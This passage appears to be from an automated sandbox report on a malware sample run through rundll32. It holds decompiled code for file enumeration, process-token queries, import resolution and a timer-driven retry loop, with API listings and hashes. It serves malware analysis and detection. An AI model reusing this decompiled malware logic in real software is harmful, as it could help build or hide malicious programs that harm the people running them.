                                                  				_v8 = _t18;
                                                  				if(_t18 != 0) {
                                                  					_t34 = _t29 + _t29;
                                                  					memcpy(_t18, _a4, _t34);
                                                  					_t10 = _t25 + 2; // 0x2
                                                  					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                  				}
                                                  				return _v8;
			}

Instruction address range: 0x04b37ccd - 0x04b37d11

                                                  APIs
                                                  • lstrlenW.KERNEL32(004F0053,75145520,?,00000008,06AF937C,?,04B3747C,004F0053,06AF937C,?,?,?,?,?,?,04B36814), ref: 04B37CC8
                                                  • lstrlenW.KERNEL32(04B3747C,?,04B3747C,004F0053,06AF937C,?,?,?,?,?,?,04B36814), ref: 04B37CCF
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04B3747C,004F0053,06AF937C,?,?,?,?,?,?,04B36814), ref: 04B37CEF
                                                  • memcpy.NTDLL(751469A0,04B3747C,00000002,00000000,004F0053,751469A0,?,?,04B3747C,004F0053,06AF937C), ref: 04B37D02
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlenmemcpy$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 2411391700-0
                                                  • Opcode ID: ee8a4afdb56999af29db1ea2d5d798588481e2038d9fec93c1560ee46c4a4860
                                                  • Instruction ID: e324e0cb0a8cfee069adddf152521c8f06b488942ee47333373ca19ace1ba276
                                                  • Opcode Fuzzy Hash: ee8a4afdb56999af29db1ea2d5d798588481e2038d9fec93c1560ee46c4a4860
                                                  • Instruction Fuzzy Hash: 90F04F72900118BBDF11DFA9CC85CDE7BACEF0825570140A2ED08D7111E631FA14DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • lstrlen.KERNEL32(06AF87FA,00000000,00000000,74ECC740,04B3A453,00000000), ref: 04B33CD8
                                                  • lstrlen.KERNEL32(?), ref: 04B33CE0
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • lstrcpy.KERNEL32(00000000,06AF87FA), ref: 04B33CF4
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04B33CFF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                  • String ID:
                                                  • API String ID: 74227042-0
                                                  • Opcode ID: 72fbaac403054c6fa16e75bf218ce38c654259107bea9d55b697d43e10e08eec
                                                  • Instruction ID: aec4713b25835c536e8dd188e83e57d00c362c1e147c814f358089619fecb277
                                                  • Opcode Fuzzy Hash: 72fbaac403054c6fa16e75bf218ce38c654259107bea9d55b697d43e10e08eec
                                                  • Instruction Fuzzy Hash: A4E06D73505264A787119BE6AC48C6FBBADEE896127044457FA00E3110C7389C148BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Executed Functions

                                                  Control-flow Graph

                                                  C-Code - Quality: 93%
                                                  			E054712D4(signed char* __eax, intOrPtr* _a4) {
                                                  				signed int _v12;
                                                  				void* _v16;
                                                  				CHAR* _v20;
                                                  				struct _FILETIME _v28;
                                                  				void* _v32;
                                                  				void* _v36;
                                                  				char* _v40;
                                                  				signed int _v44;
                                                  				long _v344;
                                                  				struct _WIN32_FIND_DATAA _v368;
                                                  				signed int _t72;
                                                  				void* _t74;
                                                  				signed int _t76;
                                                  				void* _t78;
                                                  				intOrPtr _t81;
                                                  				CHAR* _t83;
                                                  				void* _t85;
                                                  				signed char _t89;
                                                  				signed char _t91;
                                                  				intOrPtr _t93;
                                                  				void* _t96;
                                                  				long _t99;
                                                  				int _t101;
                                                  				signed int _t109;
                                                  				char* _t111;
                                                  				void* _t113;
                                                  				int _t119;
                                                  				char _t128;
                                                  				void* _t134;
                                                  				signed int _t136;
                                                  				char* _t139;
                                                  				signed int _t140;
                                                  				char* _t141;
                                                  				char* _t146;
                                                  				signed char* _t148;
                                                  				int _t151;
                                                  				void* _t152;
                                                  				void* _t153;
                                                  				void* _t154;
                                                  				void* _t165;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t148 = __eax;
                                                  				_t72 =  *0x547d278; // 0x63699bc3
                                                  				_t74 = RtlAllocateHeap( *0x547d238, 0, _t72 ^ 0x63699ac7);
                                                  				_v20 = _t74;
                                                  				if(_t74 == 0) {
                                                  					L36:
                                                  					return _v12;
                                                  				}
                                                  				_t76 =  *0x547d278; // 0x63699bc3
                                                  				_t78 = RtlAllocateHeap( *0x547d238, 0, _t76 ^ 0x63699bce);
                                                  				_t146 = 0;
                                                  				_v36 = _t78;
                                                  				if(_t78 == 0) {
                                                  					L35:
                                                  					HeapFree( *0x547d238, _t146, _v20);
                                                  					goto L36;
                                                  				}
                                                  				_t136 =  *0x547d278; // 0x63699bc3
                                                  				memset(_t78, 0, _t136 ^ 0x63699bce);
                                                  				_t81 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t154 = _t153 + 0xc;
                                                  				_t5 = _t81 + 0x547e7f2; // 0x73797325
                                                  				_t83 = E054795B1(_t5);
                                                  				_v20 = _t83;
                                                  				if(_t83 == 0) {
                                                  					L34:
                                                  					HeapFree( *0x547d238, _t146, _v36);
                                                  					goto L35;
                                                  				}
                                                  				_t134 = 0xffffffffffffffff;
                                                  				_v28.dwLowDateTime = 0x63699bce;
                                                  				_v28.dwHighDateTime = 0x63699bce;
                                                  				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                  				_v32 = _t85;
                                                  				if(_t85 != 0x63699bce) {
                                                  					GetFileTime(_t85,  &_v28, 0, 0);
                                                  					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                                  					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                                  					FindCloseChangeNotification(_v32); // executed
                                                  				}
                                                  				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                                  				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                                  				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                                  				 *_t148 = _t91;
                                                  				_v32 = _t91 & 0x000000ff;
                                                  				_t93 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t16 = _t93 + 0x547e813; // 0x642e2a5c
                                                  				_v40 = _t146;
                                                  				_v44 = _t89 & 0x000000ff;
                                                  				__imp__(_v20, _t16);
                                                  				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                                  				_v16 = _t96;
                                                  				if(_t96 == _t134) {
                                                  					_t146 = 0;
                                                  					goto L34;
                                                  				}
                                                  				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				while(_t99 > 0) {
                                                  					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                                  					if(_t101 == 0) {
                                                  						FindClose(_v16);
                                                  						_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						_v28.dwHighDateTime = _v344;
                                                  						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                                  					}
                                                  					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                                  				}
                                                  				_v12 = _v12 & 0x00000000;
                                                  				while(1) {
                                                  					_t109 = _v44;
                                                  					if(_v12 <= _t109) {
                                                  						goto L15;
                                                  					}
                                                  					_t140 = _v12;
                                                  					if(_t140 > _v32) {
                                                  						_t141 = _v36;
                                                  						 *_a4 = _t141;
                                                  						while(1) {
                                                  							_t128 =  *_t141;
                                                  							if(_t128 == 0) {
                                                  								break;
                                                  							}
                                                  							if(_t128 < 0x30) {
                                                  								 *_t141 = _t128 + 0x20;
                                                  							}
                                                  							_t141 = _t141 + 1;
                                                  						}
                                                  						_v12 = 1;
                                                  						FindClose(_v16); // executed
                                                  						_t146 = 0;
                                                  						goto L35;
                                                  					}
                                                  					_t165 = _t140 - _t109;
                                                  					L15:
                                                  					if(_t165 == 0 || _v12 == _v32) {
                                                  						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                                  						_t139 = _v40;
                                                  						_t151 = _t111 -  &(_v368.cFileName);
                                                  						_t113 = 0;
                                                  						if(_t139 != 0) {
                                                  							_t48 = _t151 - 4; // -4
                                                  							_t113 = _t48;
                                                  							if(_t113 > _t151) {
                                                  								_t113 = 0;
                                                  							}
                                                  						}
                                                  						if(_t151 > 4) {
                                                  							_t151 = 4;
                                                  						}
                                                  						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                                  						_t154 = _t154 + 0xc;
                                                  						_v40 =  &(_v40[_t151]);
                                                  					}
                                                  					do {
                                                  						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                                  						if(_t119 == 0) {
                                                  							FindClose(_v16);
                                                  							_v16 = FindFirstFileA(_v20,  &_v368);
                                                  						}
                                                  					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                                  					_v12 = _v12 + 1;
                                                  				}
			}

Instruction address range: 0x054712dd - 0x05471582

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 054712FF
                                                  • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 05471321
                                                  • memset.NTDLL ref: 0547133B
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,054723E9,63699BCE,05471354,73797325), ref: 054795C2
                                                    • Part of subcall function 054795B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 054795DC
                                                  • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 05471379
                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 0547138D
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 054713A4
                                                  • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 054713B0
                                                  • lstrcat.KERNEL32(?,642E2A5C), ref: 054713F1
                                                  • FindFirstFileA.KERNELBASE(?,?), ref: 05471407
                                                  • CompareFileTime.KERNEL32(?,?), ref: 05471425
                                                  • FindNextFileA.KERNELBASE(054796C1,?), ref: 05471439
                                                  • FindClose.KERNEL32(054796C1), ref: 05471446
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 05471452
                                                  • CompareFileTime.KERNEL32(?,?), ref: 05471474
                                                  • StrChrA.SHLWAPI(?,0000002E), ref: 054714A7
                                                  • memcpy.NTDLL(00000000,?,00000000), ref: 054714E0
                                                  • FindNextFileA.KERNELBASE(054796C1,?), ref: 054714F5
                                                  • FindClose.KERNEL32(054796C1), ref: 05471502
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0547150E
                                                  • CompareFileTime.KERNEL32(?,?), ref: 0547151E
                                                  • FindClose.KERNELBASE(054796C1), ref: 05471553
                                                  • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 05471565
                                                  • HeapFree.KERNEL32(00000000,?), ref: 05471575
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                  • String ID:
                                                  • API String ID: 2944988578-0
                                                  • Opcode ID: 3c99cdcdc79d46ee081be034d2d3f91d1274c6dd82bbc987bec726c4d46940e7
                                                  • Instruction ID: 018805d7301e2d4da59d830e91aa7b2d40d027a400185282540d6afac4b8a91b
                                                  • Opcode Fuzzy Hash: 3c99cdcdc79d46ee081be034d2d3f91d1274c6dd82bbc987bec726c4d46940e7
                                                  • Instruction Fuzzy Hash: 318126B1D1011DAFDB25CFA5DC85AEEBBB9FF48300F1045AAE505E6250DB309A45CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 38%
                                                  			E054783B7(char _a4, void* _a8) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				char _v16;
                                                  				void* _v20;
                                                  				char _v24;
                                                  				char _v28;
                                                  				char _v32;
                                                  				char _v36;
                                                  				char _v40;
                                                  				void* _v44;
                                                  				void** _t33;
                                                  				void* _t40;
                                                  				void* _t43;
                                                  				void** _t44;
                                                  				intOrPtr* _t47;
                                                  				char _t48;
                                                  
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v20 = _a4;
                                                  				_t48 = 0;
                                                  				_v16 = 0;
                                                  				_a4 = 0;
                                                  				_v44 = 0x18;
                                                  				_v40 = 0;
                                                  				_v32 = 0;
                                                  				_v36 = 0;
                                                  				_v28 = 0;
                                                  				_v24 = 0;
                                                  				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                                  					_t33 =  &_v8;
                                                  					__imp__(_v12, 8, _t33);
                                                  					if(_t33 >= 0) {
                                                  						_t47 = __imp__;
                                                  						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                                  						_t44 = E05472049(_a4);
                                                  						if(_t44 != 0) {
                                                  							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                                  							if(_t40 >= 0) {
                                                  								memcpy(_a8,  *_t44, 0x1c);
                                                  								_t48 = 1;
                                                  							}
                                                  							E05479039(_t44);
                                                  						}
                                                  						NtClose(_v8); // executed
                                                  					}
                                                  					NtClose(_v12);
                                                  				}
                                                  				return _t48;
                                                  			}

                                                  APIs
                                                  • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 054783FE
                                                  • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 05478411
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0547842D
                                                    • Part of subcall function 05472049: RtlAllocateHeap.NTDLL(00000000,00000000,05477E50), ref: 05472055
                                                  • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0547844A
                                                  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 05478457
                                                  • NtClose.NTDLL(?), ref: 05478469
                                                  • NtClose.NTDLL(00000000), ref: 05478473
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                  • String ID:
                                                  • API String ID: 2575439697-0
                                                  • Opcode ID: 4b7c98fe4cf412f543fc4218cb360a7771d13cd3f525563e157047db27b96185
                                                  • Instruction ID: 6ddc214d61c9fcaccb06a873bcd443acdb1ef4126e8c6326def2c5c25ebcf032
                                                  • Opcode Fuzzy Hash: 4b7c98fe4cf412f543fc4218cb360a7771d13cd3f525563e157047db27b96185
                                                  • Instruction Fuzzy Hash: 0C21E6B2A1022CBBDB119F95CC89ADEBFBDEF08750F104066F905A6110D7B19A44DFE0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 51%
                                                  			E0547ADE5(long _a4, long _a8) {
                                                  				signed int _v8;
                                                  				intOrPtr _v16;
                                                  				LONG* _v28;
                                                  				long _v40;
                                                  				long _v44;
                                                  				long _v48;
                                                  				CHAR* _v52;
                                                  				long _v56;
                                                  				CHAR* _v60;
                                                  				long _v64;
                                                  				signed int* _v68;
                                                  				char _v72;
                                                  				signed int _t76;
                                                  				signed int _t80;
                                                  				signed int _t81;
                                                  				intOrPtr* _t82;
                                                  				intOrPtr* _t83;
                                                  				intOrPtr* _t85;
                                                  				intOrPtr* _t90;
                                                  				intOrPtr* _t95;
                                                  				intOrPtr* _t98;
                                                  				struct HINSTANCE__* _t99;
                                                  				void* _t102;
                                                  				intOrPtr* _t104;
                                                  				void* _t115;
                                                  				long _t116;
                                                  				void _t125;
                                                  				void* _t131;
                                                  				signed short _t133;
                                                  				struct HINSTANCE__* _t138;
                                                  				signed int* _t139;
                                                  
                                                  				_t139 = _a4;
                                                  				_v28 = _t139[2] + 0x5470000;
                                                  				_t115 = _t139[3] + 0x5470000;
                                                  				_t131 = _t139[4] + 0x5470000;
                                                  				_v8 = _t139[7];
                                                  				_v60 = _t139[1] + 0x5470000;
                                                  				_v16 = _t139[5] + 0x5470000;
                                                  				_v64 = _a8;
                                                  				_v72 = 0x24;
                                                  				_v68 = _t139;
                                                  				_v56 = 0;
                                                  				asm("stosd");
                                                  				_v48 = 0;
                                                  				_v44 = 0;
                                                  				_v40 = 0;
                                                  				if(( *_t139 & 0x00000001) == 0) {
                                                  					_a8 =  &_v72;
                                                  					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                  					return 0;
                                                  				}
                                                  				_t138 =  *_v28;
                                                  				_t76 = _a8 - _t115 >> 2 << 2;
                                                  				_t133 =  *(_t131 + _t76);
                                                  				_a4 = _t76;
                                                  				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                  				_v56 = _t80;
                                                  				_t81 = _t133 + 0x5470002;
                                                  				if(_t80 == 0) {
                                                  					_t81 = _t133 & 0x0000ffff;
                                                  				}
                                                  				_v52 = _t81;
                                                  				_t82 =  *0x547d1a0; // 0x0
                                                  				_t116 = 0;
                                                  				if(_t82 == 0) {
                                                  					L6:
                                                  					if(_t138 != 0) {
                                                  						L18:
                                                  						_t83 =  *0x547d1a0; // 0x0
                                                  						_v48 = _t138;
                                                  						if(_t83 != 0) {
                                                  							_t116 =  *_t83(2,  &_v72);
                                                  						}
                                                  						if(_t116 != 0) {
                                                  							L32:
                                                  							 *_a8 = _t116;
                                                  							L33:
                                                  							_t85 =  *0x547d1a0; // 0x0
                                                  							if(_t85 != 0) {
                                                  								_v40 = _v40 & 0x00000000;
                                                  								_v48 = _t138;
                                                  								_v44 = _t116;
                                                  								 *_t85(5,  &_v72);
                                                  							}
                                                  							return _t116;
                                                  						} else {
                                                  							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                  								L27:
                                                  								_t116 = GetProcAddress(_t138, _v52);
                                                  								if(_t116 == 0) {
                                                  									_v40 = GetLastError();
                                                  									_t90 =  *0x547d19c; // 0x0
                                                  									if(_t90 != 0) {
                                                  										_t116 =  *_t90(4,  &_v72);
                                                  									}
                                                  									if(_t116 == 0) {
                                                  										_a4 =  &_v72;
                                                  										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                  										_t116 = _v44;
                                                  									}
                                                  								}
                                                  								goto L32;
                                                  							} else {
                                                  								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                  								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                  									_t116 =  *(_a4 + _v16);
                                                  									if(_t116 != 0) {
                                                  										goto L32;
                                                  									}
                                                  								}
                                                  								goto L27;
                                                  							}
                                                  						}
                                                  					}
                                                  					_t98 =  *0x547d1a0; // 0x0
                                                  					if(_t98 == 0) {
                                                  						L9:
                                                  						_t99 = LoadLibraryA(_v60); // executed
                                                  						_t138 = _t99;
                                                  						if(_t138 != 0) {
                                                  							L13:
                                                  							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                  								FreeLibrary(_t138);
                                                  							} else {
                                                  								if(_t139[6] != 0) {
                                                  									_t102 = LocalAlloc(0x40, 8);
                                                  									if(_t102 != 0) {
                                                  										 *(_t102 + 4) = _t139;
                                                  										_t125 =  *0x547d198; // 0x0
                                                  										 *_t102 = _t125;
                                                  										 *0x547d198 = _t102;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_v40 = GetLastError();
                                                  						_t104 =  *0x547d19c; // 0x0
                                                  						if(_t104 == 0) {
                                                  							L12:
                                                  							_a8 =  &_v72;
                                                  							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                  							return _v44;
                                                  						}
                                                  						_t138 =  *_t104(3,  &_v72);
                                                  						if(_t138 != 0) {
                                                  							goto L13;
                                                  						}
                                                  						goto L12;
                                                  					}
                                                  					_t138 =  *_t98(1,  &_v72);
                                                  					if(_t138 != 0) {
                                                  						goto L13;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				_t116 =  *_t82(0,  &_v72);
                                                  				if(_t116 != 0) {
                                                  					goto L33;
                                                  				}
                                                  				goto L6;
                                                  			}
                                                  0x0547af36
                                                  0x0547af3a
                                                  0x0547af40
                                                  0x0547af48
                                                  0x0547af4a
                                                  0x0547af4d
                                                  0x0547af53
                                                  0x0547af55
                                                  0x0547af55
                                                  0x0547af48
                                                  0x0547af3a
                                                  0x00000000
                                                  0x0547af34
                                                  0x0547aeed
                                                  0x0547aef0
                                                  0x0547aef7
                                                  0x0547af07
                                                  0x0547af0a
                                                  0x0547af1a
                                                  0x00000000
                                                  0x0547af20
                                                  0x0547af01
                                                  0x0547af05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547af05
                                                  0x0547aed2
                                                  0x0547aed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0547aed6
                                                  0x0547aeaf
                                                  0x0547aeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0547AE5E
                                                  • LoadLibraryA.KERNELBASE(?), ref: 0547AEDB
                                                  • GetLastError.KERNEL32 ref: 0547AEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 0547AF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: 49634c80816c2d1e4dc233813b5d31ed2436d25b41fc61f87047507ddcc9fdc4
                                                  • Instruction ID: 2dbfc97c07a5c142d0cc8178042d3beb56b2069f4cccb6ae45f553b665337d31
                                                  • Opcode Fuzzy Hash: 49634c80816c2d1e4dc233813b5d31ed2436d25b41fc61f87047507ddcc9fdc4
                                                  • Instruction Fuzzy Hash: B88106B1A10209AFDB24CFA9D885AEEBBB5FB48210F14816AF515E7344EB70E945CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 83%
                                                  			E05476786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                  				struct %anon52 _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				char _v20;
                                                  				signed int _v24;
                                                  				intOrPtr _v32;
                                                  				union _LARGE_INTEGER _v36;
                                                  				intOrPtr _v40;
                                                  				void* _v44;
                                                  				void _v88;
                                                  				char _v92;
                                                  				struct %anon52 _t46;
                                                  				intOrPtr _t51;
                                                  				long _t53;
                                                  				void* _t54;
                                                  				struct %anon52 _t60;
                                                  				long _t64;
                                                  				signed int _t65;
                                                  				void* _t68;
                                                  				void* _t70;
                                                  				signed int _t71;
                                                  				intOrPtr _t73;
                                                  				intOrPtr _t76;
                                                  				void** _t78;
                                                  				void* _t80;
                                                  
                                                  				_t73 = __edx;
                                                  				// _v92.._v88 is a zeroed 48-byte table: three 16-byte entries, one per state of
                                                  				// the loop below. The HeapFree loop at L12 walks the same three entries.
                                                  				_v92 = 0;
                                                  				memset( &_v88, 0, 0x2c);
                                                  				// _v44 and _v40 are adjacent on the stack and form the two-handle array handed to
                                                  				// WaitForMultipleObjects: [0] = this timer, [1] = the global handle at 0x547d26c.
                                                  				_t46 = CreateWaitableTimerA(0, 1, 0);
                                                  				_v44 = _t46;
                                                  				if(_t46 == 0) {
                                                  					_v8.LowPart = GetLastError();
                                                  				} else {
                                                  					// L0547B0C8 is _allmul (see APIs): (*0x547d240) * 0xFFFFFFFFFF676980.
                                                  					// 0xFFFFFFFFFF676980 == -10,000,000; a negative due time is relative to now in
                                                  					// 100-ns units, so the timer fires after *0x547d240 seconds.
                                                  					_push(0xffffffff);
                                                  					_push(0xff676980);
                                                  					_push(0);
                                                  					_push( *0x547d240);
                                                  					_v20 = 0;
                                                  					_v16 = 0;
                                                  					L0547B0C8();
                                                  					_v36.LowPart = _t46;
                                                  					_v32 = _t73;
                                                  					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  					_t51 =  *0x547d26c; // 0x31c
                                                  					_v40 = _t51;
                                                  					// 0 (WAIT_OBJECT_0) means the timer fired. Any other result, e.g. the second
                                                  					// handle being signalled, skips the work and goes straight to cleanup.
                                                  					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
                                                  					_v8.LowPart = _t53;
                                                  					if(_t53 == 0) {
                                                  						if(_a8 != 0) {
                                                  							L4:
                                                  							 *0x547d24c = 5;
                                                  						} else {
                                                  							_t68 = E054773FD(_t73); // executed
                                                  							if(_t68 != 0) {
                                                  								goto L4;
                                                  							}
                                                  						}
                                                  						_v12 = 0;
                                                  						L6:
                                                  						// State machine over _v12 = 0, 1, 2. State 1 is skipped unless bit 0 of the
                                                  						// global flags at 0x547d260 is set.
                                                  						if(_v12 == 1 && ( *0x547d260 & 0x00000001) == 0) {
                                                  							_v12 = 2;
                                                  						}
                                                  						_t71 = _v12;
                                                  						_t58 = _t71 << 4;
                                                  						_t76 = _t80 + (_t71 << 4) - 0x54;
                                                  						_t72 = _t71 + 1;
                                                  						_v24 = _t71 + 1;
                                                  						// Fills the 16-byte table entry that belongs to this state (index _v12).
                                                  						_t60 = E05478504(_t72, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16);
                                                  						_v8.LowPart = _t60;
                                                  						if(_t60 != 0) {
                                                  							goto L17;
                                                  						}
                                                  						_t65 = _v24;
                                                  						_t90 = _t65 - 3;
                                                  						_v12 = _t65;
                                                  						if(_t65 != 3) {
                                                  							goto L6;
                                                  						} else {
                                                  							// All three entries filled: hand the whole table to E05473BF1.
                                                  							_v8.LowPart = E05473BF1(_t72, _t90,  &_v92, _a4, _a8);
                                                  						}
                                                  						goto L12;
                                                  						L17:
                                                  						// Error path. Any error other than 0x10d2 waits *0x547d244 seconds and retries
                                                  						// the same state. 0x10d2 retries only when *0x547d248 is non-zero, after calling
                                                  						// E0547A1B0 and waiting *0x547d248 minutes (0xFFFFFFFFDC3CBA00 == -600,000,000
                                                  						// 100-ns units == -60 s); otherwise it returns 0x10d2.
                                                  						__eflags = _t60 - 0x10d2;
                                                  						if(_t60 != 0x10d2) {
                                                  							_push(0xffffffff);
                                                  							_push(0xff676980);
                                                  							_push(0);
                                                  							_push( *0x547d244);
                                                  							goto L21;
                                                  						} else {
                                                  							__eflags =  *0x547d248; // 0x0
                                                  							if(__eflags == 0) {
                                                  								goto L12;
                                                  							} else {
                                                  								_t60 = E0547A1B0();
                                                  								_push(0xffffffff);
                                                  								_push(0xdc3cba00);
                                                  								_push(0);
                                                  								_push( *0x547d248);
                                                  								L21:
                                                  								L0547B0C8();
                                                  								_v36.LowPart = _t60;
                                                  								_v32 = _t76;
                                                  								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
                                                  								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
